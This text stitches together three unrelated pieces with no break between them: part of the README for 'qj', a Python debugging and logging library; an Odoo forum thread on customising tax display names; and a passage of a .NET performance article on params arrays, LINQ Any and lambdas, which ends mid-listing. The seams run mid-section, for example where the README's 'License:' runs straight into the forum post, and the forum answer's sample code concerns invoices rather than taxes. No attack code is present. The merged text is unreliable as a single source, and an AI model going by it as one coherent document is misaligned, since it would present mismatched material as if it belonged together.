qj: <some_file> problem_code: [qj(other_func(qj(value), qj(other_args))) ...] <92>: ['other_func_return list', 'other_func_return of', 'other_func_return hey!']

Things to note in that output:

- The indentation automatically gives a visual indicator of how the comprehension is being computed -- you can see how the loops happen and when an iteration gets skipped at a glance or so (e.g., the two lines with the same indentation should jump out, and closer inspection shows that the if statement generated the False, which explains why the previous indentation pattern didn't repeat).
- You didn't have to specify any logging strings -- qj extracted the source code from the call site.
You can change the description string with qj(foo, 'this particular foo'):

qj: <some_file> some_func: this particular foo <149>: foo

If qj can't find the correct source code, it will log the type of the output instead. If that happens, or if you don't want to see the line of code, you might change the previous logging to look like this:

def problem_code(...):
    ...
    problem_array = qj([qj(other_func(qj(value), qj(other_args)), 'other_func return')
                        for value in qj(s='computed array', x=compute_some_array(qj(more_args)))
                        if qj(s='if', x=some_tricky_condition)], 'problem_array')

qj: <some_file> problem_code: more_args <153>: ['list', 'of', 'more_args']
qj: <some_file> problem_code: computed array <153>: ['list', 'of', 'things', 'hey!']
qj: <some_file> problem_code: if <153>: True
qj: <some_file> problem_code: other_args <153>: ['list', 'of', 'other_args']
qj: <some_file> problem_code: value <153>: list
qj: <some_file> problem_code: other_func return <153>: other_func_return list
qj: <some_file> problem_code: if <153>: True
qj: <some_file> problem_code: other_args <153>: ['list', 'of', 'other_args']
qj: <some_file> problem_code: value <153>: of
qj: <some_file> problem_code: other_func return <153>: other_func_return of
qj: <some_file> problem_code: if <153>: False
qj: <some_file> problem_code: if <153>: True
qj: <some_file> problem_code: other_args <153>: ['list', 'of', 'other_args']
qj: <some_file> problem_code: value <153>: hey!
qj: <some_file> problem_code: other_func return <153>: other_func_return hey!
qj: <some_file> problem_code: problem_array <153>: ['other_func_return list', 'other_func_return of', 'other_func_return hey!']

Note that both positional arguments (qj(value, 'val')) and keyword arguments (qj(s='val', x=value)) can be used.

Advanced Usage:

These are ordered by the likelihood that you will want to use them.

You can enter the debugger with qj(d=1):

This drops you into the debugger -- it even works in jupyter notebooks!
You can use this to drop into the debugger in the middle of executing a comprehension:

```
[qj(d=(value=='foo'), x=value) for value in ['foo', 'bar']]

qj: <some_file> some_func: d=(value=='foo'), x=value <198>: foo
> <some_file.py>(198)some_func()
----> 198 [qj(d=(value=='foo'), x=value) for value in ['foo', 'bar']]

ipdb> value
'foo'
```

You can selectively turn logging off with qj(foo, b=0):

This can be useful if you only care about logging when a particular value shows up:

```
[qj(b=('f' in value), x=value) for value in ['foo', 'bar']]

qj: <some_file> some_func: b=('f' in value), x=value <208>: foo
```

Note the lack of a log for 'bar'.

If logging is disabled for any reason, the other argument-based features will not trigger either:

```
qj(foo, d=1, b=(foo == 'foo'))
```

This will only drop into the debugger if foo == 'foo'.

Logging can be disabled for three reasons:

- b=False, as described above.
- qj.LOG = False (see Parameters below).
- You are attempting to print more than qj.MAX_FRAME_LOGS in the current stack frame (see Parameters below).

You can log extra context with qj(foo, l=lambda _: other_vars):

This is useful for logging other variables in the same context:

```
[qj(foo, l=lambda _: other_comp_var) for foo, other_comp_var in ...]

qj: <some_file> some_func: foo, l=lambda _: other_comp_var <328>: foo
qj: <some_file> some_func: ['other', 'comprehension', 'var']
qj: <some_file> some_func: foo, l=lambda _: other_comp_var <328>: bar
qj: <some_file> some_func: ['other', 'comprehension', 'var']
```

The input (x) is passed as the argument to the lambda:

```
qj(foo, l=lambda x: x.replace('f', 'z'))

qj: <some_file> some_func: foo, l=lambda x: x.replace('f', 'z') <336>: foo
qj: <some_file> some_func: zoo
```

Note that qj attempts to nicely align the starts of log messages that are all generated from the same call to qj.

You can log the timing of arbitrary code chunks with qj(tic=1) ... qj(toc=1):

```
qj(tic=1)
do_a_bunch()
of_things()
qj(toc=1)

qj: <some_file> some_func: tic=1 <347>: Adding tic.
```
```
qj: <some_file> some_func: toc=1 <350>: Computing toc.
qj: 2.3101 seconds since tic=1.
```

You can nest tic and toc:

```
qj(tic=1)
do_something()
qj(tic=2)
do_something_else()
qj(toc=1)
finish_up()
qj(toc=1)

qj: <some_file> some_func: tic=1 <348>: Adding tic.
qj: <some_file> some_func: tic=2 <350>: Adding tic.
qj: <some_file> some_func: toc=1 <352>: Computing toc.
qj: 0.5200 seconds since tic=2.
qj: <some_file> some_func: toc=1 <354>: Computing toc.
qj: 1.3830 seconds since tic=1.
```

Since any True value will turn on tic, you can use it as a convenient identifier, as above, where tic=2 is the second tic. The actual identifier printed by toc is whatever description string was used for the tic, though, so you can give descriptive names just as in any other log message:

```
qj(foo, 'start foo', tic=1)
foo.start()
qj(foo.finish(), toc=1)

qj: <some_file> some_func: start foo <367>: <Foo object at 0x1165579d0>
qj: Added tic.
qj: <some_file> some_func: foo.finish(), toc=1 <369>: Foo.SUCCESSFUL_FINISH
qj: 5.9294 seconds since start foo.
```

You can use tic and toc in the same call to log the duration of any looping code:

```
[qj(x, tic=1, toc=1) for x in [1, 2, 3]]

qj: <some_file> some_func: x, tic=1, toc=1 <380>: 1
qj: Added tic.
qj: <some_file> some_func: x, tic=1, toc=1 <380>: 2
qj: 0.0028 seconds since x, tic=1, toc=1.
qj: Added tic.
qj: <some_file> some_func: x, tic=1, toc=1 <380>: 3
qj: 0.0028 seconds since x, tic=1, toc=1.
qj: Added tic.
```

You can use toc=-1 to clear out all previous tics:

```
qj(tic=1)
do_something()
qj(tic=2)
do_something_else()
qj(tic=3)
finish_up()
qj(toc=-1)

qj: <some_file> some_func: tic=1 <394>: Adding tic.
qj: <some_file> some_func: tic=2 <396>: Adding tic.
qj: <some_file> some_func: tic=3 <398>: Adding tic.
qj: <some_file> some_func: toc=1 <400>: Computing toc.
qj: 0.2185 seconds since tic=3.
qj: 0.5200 seconds since tic=2.
qj: 1.3830 seconds since tic=1.
```
You can log the public properties of the input with qj(foo, p=1):

```
qj(some_object, p=1)

qj: <some_file> some_func: some_object, p=1: some_object.__str__() output
qj: Public properties:
      some_method(a, b=None, c='default')
      some_public_property
```

Note that this can be dangerous. In order to log the method signatures, Python's inspect module can actually cause code to execute on your object. Specifically, if you have @property getters on your object, that code will be run. If your @property getter changes state, using this flag to print the object's public API will change your object's state, which might make your debugging job even harder. (Of course, you should never change state in a getter.)

This is generally useful for quickly checking the API of an unfamiliar object while working in a jupyter notebook.

You can log some useful stats about x instead of its value with qj(arr, n=1):

```
qj: <some_file> some_func: arr, n=1 (shape (min (mean std) max) hist) <257>: ((100, 1), (0.00085, (0.46952, 0.2795), 0.97596), array([25, 14, 23, 23, 15]))
```

This only works if the input (x) is a numeric numpy array or can be cast to one, and if numpy has already been imported somewhere in your code. Otherwise, the value of x is logged as normal. The log string is augmented with a key to the different parts of the logged value. The final value is a histogram of the array values. The number of histogram buckets defaults to 5, but can be increased by passing n an integer greater than 5:

```
qj(arr, n=10)

qj: <some_file> some_func: arr, n=10 ...: (..., array([11, 14, 8, 6, 10, 13, 14, 9, 7, 8]))
```

You can add a tensorflow.Print call to x with y = qj(some_tensor, t=1):

```
qj: <some_file> some_func: some_tensor, t=1 <258>: Tensor("some_tensor:0", ...)
qj: Wrapping return value in tf.Print operation.
```

And then later:

```
sess.run(y)

qj: <some_file> some_func: some_tensor, t=1 <258>: [10 1] [[0.64550841]...
```

Note that the Tensorflow output includes the shape of the tensor first ([10 1]), followed by its value.
This only works if x is a tf.Tensor object and tensorflow has already been imported somewhere in your code.

The number of logs printed from the tf.Print call is qj.MAX_FRAME_LOGS (described below, defaults to 200) if t is True. Otherwise, it is set to int(t). Thus, t=1 prints once, but t=True prints 200 times.

You can also turn on numerics checking for any tf.Tensor with y = qj(some_tensor, tfc=1):

For example, log(0) is not a number:

```
y = qj(tf.log(tensor_with_zeros), tfc=1)

qj: <some_file> some_func: tf.log(tensor_with_zeros), tfc=1 <258>: Tensor("Log:0", ...)
qj: Wrapping return value in tf.check_numerics.
```

And then later:

```
sess.run(y)

InvalidArgumentError: qj: <some_file> some_func: tf.log(tensor_with_zeros), tfc=1 <258>: Tensor had Inf values
```

Note that tf.check_numerics is very slow, so you won't want to leave these in your graph. This also only works if x is a tf.Tensor object and tensorflow has already been imported somewhere in your code.

You can override the return value of qj by passing any value to r:

```
some_function(normal_arg, special_flag=qj(some_value, r=None))

qj: <some_file> some_func: some_value, r=None <272>: some flag value
qj: Overridden return value: None
```

As in the example, this can be useful to temporarily change or turn off a value being passed to a function, rather than having to delete the value, which you might forget about.

You can add timing logs to any function with @qj(time=1) or qj(foo, time=100):

```
@qj(time=1)
def foo():
  ...

qj: <some_file> module_level_code: time=1 <343>: Preparing decorator to measure timing...
qj: Decorating <function foo at 0x111b2bc80> with timing function.

foo()

qj: <some_file> some_func: Average timing for <function foo at 0x111c3eb18> across 1 call <343>: 0.0021 seconds
```

Note that the log message is reported from the location of the call to the function that generated the message (in this case, line 343 in some_file.py, inside of some_func).
Setting time to a larger integer value will report timing stats less frequently:

```
foo = qj(foo, time=1000)
for _ in range(1000):
  foo()

qj: <some_file> some_func: foo, time=1000 <359>: <function foo at 0x111b2be60>
qj: Wrapping return value in timing function.
qj: <some_file> some_func: Average timing for <function foo at 0x111b2be60> across 1000 calls <361>: 0.0023 seconds
```

You can catch exceptions and drop into the debugger with @qj(catch=1) or qj(foo, catch=<subclass of Exception>):

```
@qj(catch=1)
def foo():
  raise Exception('FOO!')

qj: <some_file> module_level_code: catch=1 <371>: Preparing decorator to catch exceptions...
qj: Decorating <function foo at 0x112086f50> with exception function.

foo()

qj: <some_file> some_func: Caught an exception in <function foo at 0x112086f50> <377>: FOO!
> <some_file.py>(377)<some_func>()
----> 1 foo()

ipdb>
```

This can be particularly useful in comprehensions, where you want to be able to inspect the state of the comprehension that led to an exception:

```
[qj(foo, catch=1)(x) for x in [1, 2, 3]]

qj: <some_file> some_func: foo, catch=1 <389>: <function foo at 0x1129dd7d0>
qj: Wrapping return value in exception function.
qj: <some_file> some_func: Caught an exception in <function foo at 0x1129dd7d0> <389>: FOO!
...
> <some_file.py>(389)<some_func>()
----> 1 [qj(foo, catch=1)(x) for x in [1, 2, 3]]

ipdb> x
1
```

Setting catch will always drop into the debugger when an exception is caught -- this feature is for debugging exceptions, not for replacing appropriate use of try: ... except:.

You can log all future calls to an object with qj(foo, log_all_calls=1):

```
s = qj('abc', log_all_calls=1)

qj: <some_file> some_func: 'abc', log_all_calls=1 <380>: abc
qj: Wrapping all public method calls for object.
```
```
s.replace('a', 'b')

qj: <some_file> some_func: calling replace <385>: replace('a', 'b')
qj: <some_file> some_func: returning from replace <385>: bbc
```

This can break your code in a variety of ways and fail silently in other ways, but some problems are much easier to debug with this functionality. For example, figuring out why sequences of numbers from a seeded random number generator differ on different runs with the same seed:

```
rng = qj(np.random.RandomState(1), log_all_calls=1)

qj: <some_file> some_func: np.random.RandomState(1), log_all_calls=1 <395>: <mtrand.RandomState object at 0x10c16e780>
qj: Wrapping all function calls for object.

for k in set(list('abcdefghijklmnop')):
  rng.randint(ord(k))

# First run:
qj: <some_file> some_func: calling randint <413>: randint(97)
qj: <some_file> some_func: returning from randint <413>: 37
qj: <some_file> some_func: calling randint <413>: randint(99)
qj: <some_file> some_func: returning from randint <413>: 12
qj: <some_file> some_func: calling randint <413>: randint(98)
qj: <some_file> some_func: returning from randint <413>: 72
...

# Subsequent run with a reseeded rng:
qj: <some_file> some_func: calling randint <413>: randint(101)
qj: <some_file> some_func: returning from randint <413>: 9
qj: <some_file> some_func: calling randint <413>: randint(100)
qj: <some_file> some_func: returning from randint <413>: 75
qj: <some_file> some_func: calling randint <413>: randint(103)
qj: <some_file> some_func: returning from randint <413>: 5
...
```

This fails (in theory, but not as written) because sets are iterated in an undefined order. Similar failures are possible with much more subtle structure. Comparing the different series of log calls makes it very easy to find exactly where the series diverge, which gives a good chance of figuring out what the bug is.
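A rough approximation of this call-wrapping can be built with a small proxy object that intercepts attribute access and logs public method calls. This is a hedged toy sketch of the general technique (qj's real implementation handles many edge cases this proxy ignores); the `CallLogger` name is invented for the example:

```python
class CallLogger(object):
    # Proxy that logs every public method call on the wrapped object,
    # loosely mimicking what qj(obj, log_all_calls=1) provides.
    def __init__(self, target):
        self._target = target
        self.calls = []  # recorded (name, args, result) tuples

    def __getattr__(self, name):
        # Only invoked for attributes the proxy itself doesn't define,
        # so lookups are forwarded to the wrapped object.
        attr = getattr(self._target, name)
        if not callable(attr) or name.startswith('_'):
            return attr

        def logged(*args, **kwargs):
            result = attr(*args, **kwargs)
            self.calls.append((name, args, result))
            print('calling %s%r -> %r' % (name, args, result))
            return result
        return logged

s = CallLogger('abc')
replaced = s.replace('a', 'b')
```

Comparing the recorded `calls` lists from two runs is exactly the kind of series-diffing described above for the seeded-RNG bug.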
You can make particular log messages stand out with qj(foo, pad=<str or int>):

```
qj(foo, pad='#')

##################################################
qj: <some_file> some_func: foo, pad='#' <461>: foo
##################################################
```

Similarly, you can add blank lines:

```
qj(foo, pad=3)

# Some other log message...


qj: <some_file> some_func: foo, pad=3 <470>: foo


# The next log message...
```

Parameters:

There are seven global parameters for controlling the logger:

- qj.LOG: Turns logging on or off globally. Starts out set to True, so logging is on.
- qj.LOG_FN: Which log function to use. All log messages are passed to this function as a fully-formed string, so the only constraints are that this function takes a single parameter and that it is a function -- e.g., you can't set qj.LOG_FN = print unless you are using from __future__ import print_function (although you can define your own log function that just calls print if you don't like the default). Defaults to logging.info wrapped in a lambda to support colorful logs.
- qj.STR_FN: Which string conversion function to use. All objects to be logged are passed to this function directly, so it must take an arbitrary python object and return a python string. Defaults to str, but a nice override is pprint.pformat.
- qj.MAX_FRAME_LOGS: Limits the number of times per stack frame the logger will print for each qj call. If the limit is hit, it prints an informative message after the last log of the frame. Defaults to 200.
- qj.COLOR: Turns colored log output on or off globally. Starts out set to True, so colorized logging is on.
- qj.PREFIX: String that all qj logs will use as a prefix. Defaults to 'qj: '.
- qj.DEBUG_FN: Which debugger to use. You shouldn't need to set this in most situations. The function needs to take a single argument, which is the stack frame that the logger should start in. If this is not set, then the first time debugging is requested, qj attempts to load ipdb. If ipdb isn't available, it falls back to using pdb.
In both cases, qj.DEBUG_FN is set to the respective set_trace function in a manner that supports setting the stack frame.

Global Access:

In many cases when debugging, you need to dive into many different files across many different modules. In those cases, it is nice to have a single logging and debugging interface that is immediately available in all of the files you touch, without having to import anything additional in each file.

To support this use case, you can call the following function after importing in one file:

```
from qj import qj
qj.make_global()
```

This will add qj to python's equivalent of a global namespace, allowing you to call qj from any python code that runs after the call to qj.make_global(), no matter what file or module it is in.

When using qj from a jupyter notebook, qj.make_global() is automatically called when qj is imported.

As described in Basic Usage, you can also just use:

```
from qj_global import qj
```

This is generally what you want, but qj does not force you to pollute the global namespace if you don't want to (except in jupyter notebooks).

qj Magic Warning:

qj adds a local variable to the stack frame it is called from. That variable is __qj_magic_wocha_doin__. If you happen to have a local variable with the same name and you call qj, you're going to have a bad time.

Testing:

qj has extensive tests. You can run them with nosetests:

```
$ nosetests
........................................................................................
----------------------------------------------------------------------
Ran 88 tests in 1.341s

OK
```

Or you can run them directly:

```
$ python qj/tests/qj_test.py
........................................................................................
```
```
----------------------------------------------------------------------
Ran 88 tests in 1.037s

OK
```

If you have both python 2.7 and python 3.6+ installed, you can test both versions:

```
$ nosetests --where=qj/tests --py3where=qj/tests --py3where=qj/tests3
$ python3 qj/tests/qj_test.py
$ python3 qj/tests3/qj_test.py
```

Disclaimer:

This project is not an official Google project. It is not supported by Google, and Google specifically disclaims all warranties as to its quality, merchantability, or fitness for a particular purpose.

Contributing:

See how to contribute.

License:
Odoo Help

Change default 'name' value in account.invoice.tax object

Hi Guys,

From this post, the first answer states this:

-----
Invoice Reports Tax detail 'Tax code - Tax Name' it is default functionality in Openerp 7.
-----

I would like to change the default from 'Tax code - Tax Name' to simply 'Tax Name'; however, I cannot work out how to make this change. In fact, I have added a custom field to the 'account.tax' object, called x_description_short, which I would prefer to use instead. However, if someone can point me in the direction of HOW to change the default value, I should be able to work out the rest.

To clarify, I am running OpenERP online via odoo.com.

Regards,

[Comment] Ludo, it seems that I cannot comment directly on your post, probably due to lack of 'reputation' or something like that. Thanks for your answer; however, how can I apply that change on the odoo.com online service?

[Comment] Ow, I see. I totally missed that part. I do not know if you are allowed to create custom modules on the online service. If that is the case, create a small module that does just that. If not, I think you will have no luck with my suggested method. Maybe someone else has another idea?

[Comment] I don't think that I can

[Answer] When inheriting account.tax, you can override the "name_get" method. You can use that method to make Odoo return a custom value each time the record appears somewhere on a list or form.

Note: This is system-wide, so ALL the occurrences of account.tax will use this method to determine the display name.
This is an example as found in the standard account module:

    def name_get(self, cr, uid, ids, context=None):
        if not ids:
            return []
        types = {
            'out_invoice': _('Invoice'),
            'in_invoice': _('Supplier Invoice'),
            'out_refund': _('Refund'),
            'in_refund': _('Supplier Refund'),
        }
        return [(r['id'], '%s %s' % (r['number'] or types[r['type']], r['name'] or ''))
                for r in self.read(cr, uid, ids, ['type', 'number', 'name'],
                                   context, load='_classic_write')]
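The override the answer suggests would return just the tax name (or the questioner's custom x_description_short field) from name_get. Since real Odoo model code can't run outside an Odoo server, the sketch below models the pattern with a plain stand-in class; the field names follow the question, and the real version would live in a module inheriting account.tax:

```python
class AccountTaxStub(object):
    # Stands in for an account.tax model. In a real custom module you
    # would inherit account.tax and override name_get the same way.
    def __init__(self, records):
        # records: {id: {'name': ..., 'x_description_short': ...}}
        self._records = records

    def name_get(self, ids):
        # Return (id, display_name) pairs using only the short
        # description (falling back to the plain tax name), instead of
        # the default 'Tax code - Tax Name' format.
        result = []
        for record_id in ids:
            record = self._records[record_id]
            display = record.get('x_description_short') or record['name']
            result.append((record_id, display))
        return result

taxes = AccountTaxStub({
    1: {'name': 'VAT 21% - Value Added Tax', 'x_description_short': 'VAT 21%'},
    2: {'name': 'Exempt'},
})
names = taxes.name_get([1, 2])
```

As the answer warns, an override like this is system-wide: every list and form that displays an account.tax record goes through name_get.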
# Optimization of .NET applications: a big result of small edits ![0852_NETAppsPerf_MinChangesMajorRes/image1.png](https://habrastorage.org/r/w1560/getpro/habr/post_images/4f4/53f/118/4f453f1183ece492558bec6218169e91.png) Today we're going to discuss how small optimizations in the right places of the application can improve its performance. Imagine: we remove the creation of an extra iterator in one place, get rid of boxing in the other. As a result, we get drastic improvements because of such small edits. One old and simple idea runs like a golden thread through the article. Please, remember it. Premature optimizations are evil. Sometimes it happens that optimization and readability go in slightly different directions. Code may work better, but it is harder to read and maintain. And vice versa — code is easy to read and modify but has some performance problems. Therefore, it is important to understand what we are willing to sacrifice in such cases. A developer may read the article, rush to edit a project's code base and… get no performance improvements. And code becomes more complex. That's why it is important to (always) approach the case with a cool head. It is great if you know your application's bottlenecks where optimization can help. Otherwise, various profilers are here to the rescue. They can provide a large amount of information about the application. In particular, describe its behavior in dynamics. For example, instances of what types are created the most frequently, how much time the application spends on garbage collection, how long a particular code fragment is executed etc. Two JetBrains tools are worth mentioning: [dotTrace](https://www.jetbrains.com/profiler/) and [dotMemory](https://www.jetbrains.com/dotmemory/). They are convenient and collect a lot of information. Besides, it is perfectly visualized. JetBrains, you're cool! But let's get back to the optimizations. 
Throughout the article, we'll analyze several cases that we have faced and that seemed the most interesting. Each of the described edits gave a positive result, as it was made in the bottlenecks marked by the profilers. Unfortunately, I did not record the results of each change I made, but I'll show the general optimization result at the end of the article.

**Note**: This article is about working with .NET Framework. As experience shows (see the example with [Enum.GetHashCode](https://pvs-studio.com/en/blog/posts/csharp/0844/)), sometimes the same C# code fragment may demonstrate more optimal performance on .NET Core / .NET than on .NET Framework.

And what, in fact, are we optimizing?
-------------------------------------

The tips described in the article are relevant to every .NET application. Again, the edits are the most useful when done in the bottlenecks. Beware that we are not going to delve into any abstract theoretical reasoning. In this context, tips of the "change the code to avoid the creation of one iterator" type would look bizarre.

All the problems listed in this article were identified after I profiled the [PVS-Studio static analyzer](https://pvs-studio.com/en/pvs-studio/) for C#. The main purpose of profiling was to reduce the analysis time.

After the work started, it quickly became clear that the analyzer had serious problems with garbage collection. It took a significant amount of time. In fact, we'd known this before; we just made sure of it once again. By the way, earlier we had done several optimizations of the analyzer, and we have [a separate article](https://pvs-studio.com/en/blog/posts/csharp/0836/) on that.

However, the problem was still relevant. Look at the screenshot below ([the full-size image is here](https://import.viva64.com/docx/blog/0852_NETAppsPerf_MinChangesMajorRes/image3.png)). This is the result I got after profiling the PVS-Studio C# analyzer. It used 8 threads — 8 lines in the screenshot.
The garbage collection clearly took a significant time in each thread. ![0852_NETAppsPerf_MinChangesMajorRes/image3.png](https://habrastorage.org/r/w1560/getpro/habr/post_images/62b/d51/acb/62bd51acb8b5ee38f28f452c3f96dde0.png) We rejected "rewrite everything in C" advice and got to work. In particular, we examined the results of the profiling and locally deleted unnecessary extra/temporary objects. To our luck, this approach immediately showed results. This is going to be the main topic of the article. What did we gain? Let's keep the intrigue until the end of the article. Calling methods with a params parameter --------------------------------------- Methods with a *params* parameter declared in their signature, can take the following as an argument: * no values; * one or more values. For example, here is a method with a signature like this: ``` static void ParamsMethodExample(params String[] stringValue) ``` Let's look at its IL code: ``` .method private hidebysig static void ParamsMethodExample(string[] stringValue) cil managed { .param [1] .custom instance void [mscorlib]System.ParamArrayAttribute::.ctor() = ( 01 00 00 00 ) .... } ``` This is a simple method with one parameter, marked with the *System.ParamArrayAttribute*. The strings array is specified as the parameter type. **Fun fact**. The compiler issues the [CS0674](https://docs.microsoft.com/en-us/dotnet/csharp/misc/cs0674) error and forces you to use the *params* keyword — no way to use this attribute directly. A very simple conclusion follows from the IL code. Each time we need to call this method, the caller code has to create an array. Well, almost. Let's look at the following examples to better understand what's happening when you call this method with various arguments. The first call is without arguments. 
``` ParamsMethodExample() ``` IL code: ``` call !!0[] [mscorlib]System.Array::Empty() call void Optimizations.Program::ParamsMethodExample(string[]) ``` The method expects an array as input, so we need to get it somewhere. In this case we use a result of calling the static *System.Array.Empty* method as an argument. This allows us to avoid creating empty collections and reduce the pressure on GC*.* And now the sad part. Older versions of the compiler can generate different IL code. Like this: ``` ldc.i4.0 newarr [mscorlib]System.String call void Optimizations.Program::ParamsMethodExample(string[]) ``` In this case a new empty array is created every time we call a method that has no corresponding argument for the *params* parameter. Time to test yourself. Do the following calls differ? If so, in what way? ``` ParamsMethodExample(null); ParamsMethodExample(String.Empty); ``` Found an answer? Let's figure it out. Let's start with the call when the argument is an explicit *null*: ``` ParamsMethodExample(null); ``` IL code: ``` ldnull call void Optimizations.Program::ParamsMethodExample(string[]) ``` The array is not created in this case. The method takes *null* as an argument. Let's look at the case when we pass a non-null value to the method: ``` ParamsMethodExample(String.Empty); ``` IL code: ``` ldc.i4.1 newarr [mscorlib]System.String dup ldc.i4.0 ldsfld string [mscorlib]System.String::Empty stelem.ref call void Optimizations.Program::ParamsMethodExample(string[]) ``` Here the code is already longer than in the previous example. An array gets created before calling the method. All the arguments, that had been passed to the method's *params* parameter, get into the array. In this case an empty string is written to the array. Note that an array is also created if there are several arguments. It's created even if the arguments are explicit *null* values. 
Thus, calling methods with the *params* parameters can play a trick on you if you do not expect the implicit array creation. In some cases the compiler can optimize the method call — remove the creation of an extra array. But overall, remember about temporary objects. The profiler spotted several places where many arrays were created and collected by GC. In the corresponding methods, the code looked approximately like this: ``` bool isLoop = node.IsKindEqual(SyntaxKind.ForStatement, SyntaxKind.ForEachStatement, SyntaxKind.DoStatement, SyntaxKind.WhileStatement); ``` The *IsKindEqual* method looked like this: ``` public static bool IsKindEqual(this SyntaxNode node, params SyntaxKind[] kinds) { return kinds.Any(kind => node.IsKind(kind)); } ``` We need to create an array to call the method. After we traverse the array, it becomes unnecessary. Can we get rid of creating unnecessary arrays? Easy: ``` bool isLoop = node.IsKind(SyntaxKind.ForStatement) || node.IsKind(SyntaxKind.ForEachStatement) || node.IsKind(SyntaxKind.DoStatement) || node.IsKind(SyntaxKind.WhileStatement); ``` This edit reduced the number of the temporary arrays needed — and eased the pressure on GC. **Note**: Sometimes .NET libraries use a clever trick. Some methods with *params* parameters have overloads that take 1,2,3 parameters of the corresponding type instead of the *params* parameter. This trick helps avoid creating temporary arrays from the caller side. Enumerable.Any -------------- We have seen many times the *Any* method call in the profiling results. What's wrong with it? Let's look at the real code: the *IsKindEqual* method we've mentioned earlier. Previously we placed more emphasis on the *params* parameter. Now let's take a closer look at the method's code from the inside. 
```
public static bool IsKindEqual(this SyntaxNode node, params SyntaxKind[] kinds)
{
  return kinds.Any(kind => node.IsKind(kind));
}
```

To understand what the problem is with *Any*, we'll look "under the hood" of the method. We take the source code from our beloved [referencesource.microsoft.com](https://bit.ly/36vRkKo)

```
public static bool Any<TSource>(this IEnumerable<TSource> source,
                                Func<TSource, bool> predicate)
{
  if (source == null) throw Error.ArgumentNull("source");
  if (predicate == null) throw Error.ArgumentNull("predicate");

  foreach (TSource element in source)
  {
    if (predicate(element))
      return true;
  }

  return false;
}
```

The *foreach* loop iterates through the original collection. If the *predicate* call has returned the *true* value for at least one element, then the result of the method's work is *true*. Otherwise, it's *false*.

The main problem is that any input collection is actually interpreted as *IEnumerable\<TSource\>*. Any optimizations for specific types of collections don't exist. A little reminder that we are working with an array in this case.

You may have already guessed that the main problem with *Any* is that it creates an excess iterator to traverse the collection. If you got a little lost — don't worry, we're going to figure it out.

Let's cut off the extra fragments of the *Any* method and simplify it. However, we'll save the necessary code: the *foreach* loop and the declaration of the collection with which the loop works.
Let's look at the following code:

```
static void ForeachTest(IEnumerable<String> collection)
{
  foreach (var item in collection)
    Console.WriteLine(item);
}
```

The IL code:

```
.method private hidebysig static void ForeachTest(
  class [mscorlib]System.Collections.Generic.IEnumerable`1<string> collection)
  cil managed
{
  .maxstack 1
  .locals init (
    [0] class [mscorlib]System.Collections.Generic.IEnumerator`1<string> V_0)

  IL_0000: ldarg.0
  IL_0001: callvirt instance class
             [mscorlib]System.Collections.Generic.IEnumerator`1<!0>
             class [mscorlib]System.Collections.Generic.IEnumerable`1<string>
             ::GetEnumerator()
  IL_0006: stloc.0
  .try
  {
    IL_0007: br.s IL_0014
    IL_0009: ldloc.0
    IL_000a: callvirt instance !0
               class [mscorlib]System.Collections.Generic.IEnumerator`1<string>
               ::get_Current()
    IL_000f: call void [mscorlib]System.Console::WriteLine(string)
    IL_0014: ldloc.0
    IL_0015: callvirt instance bool
               [mscorlib]System.Collections.IEnumerator::MoveNext()
    IL_001a: brtrue.s IL_0009
    IL_001c: leave.s IL_0028
  }
  finally
  {
    IL_001e: ldloc.0
    IL_001f: brfalse.s IL_0027
    IL_0021: ldloc.0
    IL_0022: callvirt instance void [mscorlib]System.IDisposable::Dispose()
    IL_0027: endfinally
  }
  IL_0028: ret
}
```

See, a lot of things are happening here. Since the compiler doesn't know anything about the actual collection type, it has generated general-purpose code to iterate through the collection. The iterator is obtained by calling the *GetEnumerator* method (the IL_0001 label). If we obtain the iterator via the *GetEnumerator* method call, it will be created on the heap. All further interaction with the collection is based on the use of this object.

The compiler can use a special optimization while obtaining an iterator for an empty array. In this case, the *GetEnumerator* call doesn't create a new object. This topic deserves a separate note. In the general case, don't count on this optimization.

Now let's change the code a little, so the compiler knows that we're working with the array.
C# code: ``` static void ForeachTest(String[] collection) { foreach (var item in collection) Console.WriteLine(item); } ``` The corresponding IL code: ``` .method private hidebysig static void ForeachTest(string[] collection) cil managed { // Code size 25 (0x19) .maxstack 2 .locals init ([0] string[] V_0, [1] int32 V_1) IL_0000: ldarg.0 IL_0001: stloc.0 IL_0002: ldc.i4.0 IL_0003: stloc.1 IL_0004: br.s IL_0012 IL_0006: ldloc.0 IL_0007: ldloc.1 IL_0008: ldelem.ref IL_0009: call void [mscorlib]System.Console::WriteLine(string) IL_000e: ldloc.1 IL_000f: ldc.i4.1 IL_0010: add IL_0011: stloc.1 IL_0012: ldloc.1 IL_0013: ldloc.0 IL_0014: ldlen IL_0015: conv.i4 IL_0016: blt.s IL_0006 IL_0018: ret } ``` The compiler generated simpler code since it knows the collection type we're working with. Besides, all the work with the iterator has disappeared — the object is not even created. We reduce the pressure on GC. By the way, here's a "check yourself" question. If we restore C# code from this IL code, what kind of a language construction do we get? The code is obviously different from what was generated for the *foreach* loop earlier. Here's the answer. Below is the method in C#. The compiler will generate the same IL code as the one above, except for the names: ``` static void ForeachTest2(String[] collection) { String[] localArr; int i; localArr = collection; for (i = 0; i < localArr.Length; ++i) Console.WriteLine(localArr[i]); } ``` If the compiler knows that we're working with an array, it generates more optimal code by representing the *foreach* loop as the *for* loop. Unfortunately, we lose such optimizations when working with *Any*. Besides, we create an excess iterator to traverse the sequence. Lambda expressions ------------------ Lambdas are highly convenient things that make the developer's life so much easier. Until someone tries to put a lambda inside a lambda inside a lambda… Fans of doing that — please rethink this, seriously. 
In general, the use of lambda expressions eases the developer's life. But don't forget that there are entire classes "under the hood" of lambdas. This means the instances of those classes still need to be created when your application uses lambdas.

Let's get back to the *IsKindEqual* method.

```
public static bool IsKindEqual(this SyntaxNode node,
                               params SyntaxKind[] kinds)
{
  return kinds.Any(kind => node.IsKind(kind));
}
```

Now let's look at the corresponding IL code:

```
.method public hidebysig static bool IsKindEqual(
  class [Microsoft.CodeAnalysis]Microsoft.CodeAnalysis.SyntaxNode node,
  valuetype [Microsoft.CodeAnalysis.CSharp]
    Microsoft.CodeAnalysis.CSharp.SyntaxKind[] kinds) cil managed
{
  .custom instance void
    [mscorlib]System.Runtime.CompilerServices.ExtensionAttribute::.ctor()
    = ( 01 00 00 00 )
  .param [2]
  .custom instance void
    [mscorlib]System.ParamArrayAttribute::.ctor()
    = ( 01 00 00 00 )
  // Code size       32 (0x20)
  .maxstack  3
  .locals init (class OptimizationsAnalyzer.SyntaxNodeUtils
                        /'<>c__DisplayClass0_0' V_0)
  IL_0000: newobj instance void OptimizationsAnalyzer.SyntaxNodeUtils
                                /'<>c__DisplayClass0_0'::.ctor()
